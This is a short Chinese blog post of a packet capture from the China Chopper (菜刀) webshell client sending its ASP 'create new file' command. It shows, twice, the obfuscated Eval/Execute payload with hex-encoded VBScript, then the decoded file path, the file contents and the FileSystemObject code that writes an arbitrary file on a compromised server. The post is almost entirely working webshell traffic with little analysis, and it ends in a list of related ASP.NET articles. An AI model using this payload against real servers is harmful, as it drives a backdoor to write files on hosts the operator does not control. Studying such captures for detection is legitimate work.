菜刀ASP 新建文件抓包
2016-05-09 23:36
435 查看
http://blog.csdn.net/webxscan 神龙
新建文件
webxscan=Eval ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422292E4372656174655465787446696C65282222266264285265717565737428227A31222929262222292E5772697465282222265265717565737428227A322229262222293A496620457272205468656E3A533D224552524F523A2F2F2022264572722E4465736372697074696F6E3A456C73653A533D2231223A526573706F6E73652E57726974652853293A456E64204966"""")):Response.Write(""""|<-""""):Response.End"")")&z1=433A5C5C446F63756D656E747320616E642053657474696E67735C5C615C5CD7C0C3E65C5C7777775C5C2E5C5C585858585858582E747874&z2=111111111
&z1=C:\\Documents and Settings\\a\\×ÀÃæ\\www\\.\\XXXXXXX.txt
&z2=111111111
CreateObject("Scripting.FileSystemObject").CreateTextFile(""&bd(Request("z1"))&"").Write(""&Request("z2")&"")
If Err Then
S="ERROR:// "&Err.Description
Else
S="1"
Response.Write(S)
End If
->|1|<-
新建文件
webxscan=Eval ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422292E4372656174655465787446696C65282222266264285265717565737428227A31222929262222292E5772697465282222265265717565737428227A322229262222293A496620457272205468656E3A533D224552524F523A2F2F2022264572722E4465736372697074696F6E3A456C73653A533D2231223A526573706F6E73652E57726974652853293A456E64204966"""")):Response.Write(""""|<-""""):Response.End"")")&z1=433A5C5C446F63756D656E747320616E642053657474696E67735C5C615C5CD7C0C3E65C5C7777775C5C2E5C5C585858585858582E747874&z2=111111111
&z1=C:\\Documents and Settings\\a\\×ÀÃæ\\www\\.\\XXXXXXX.txt
&z2=111111111
CreateObject("Scripting.FileSystemObject").CreateTextFile(""&bd(Request("z1"))&"").Write(""&Request("z2")&"")
If Err Then
S="ERROR:// "&Err.Description
Else
S="1"
Response.Write(S)
End If
->|1|<-
相关文章推荐
- 菜刀ASP 新建文件夹抓包
- 彩票项目开发节项
- 菜刀ASP 修改文件时间名抓包
- ASP.NET mvc异常处理的方法
- IIS8集成模式下打开静态资源被aspx处理程序处理,StaticFileModule失效问题分析
- ASP.NET Core的配置(5):配置的同步[ 实例篇]
- 菜刀ASP 文件重命名抓包
- 菜刀ASP 删除文件抓包
- ASP.NET MVC 利用Razor引擎生成静态页
- ASP.NET MVC路由扩展:路由映射
- ASP.NET的路由系统:路由映射
- ASP.NET的路由系统:根据路由规则生成URL
- ASP.NET的路由系统:URL与物理文件的分离
- ASP.NET 2.0 - 导航Web.config配置
- Aspose.Words生成报告
- Asp.net访问本地JSON提示不允许访问解决方案
- 在ASP.NET 2.0中操作数据之三十四:基于DataList和Repeater跨页面的主/从报表
- ASP.NET页面中去除VIEWSTATE视
- ASP.NET获取IP的6种方法 ( 转)
- 转发 win7+iis7.5+asp.net下 CS0016: 未能写入输出文件“c:\Windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files 解决方案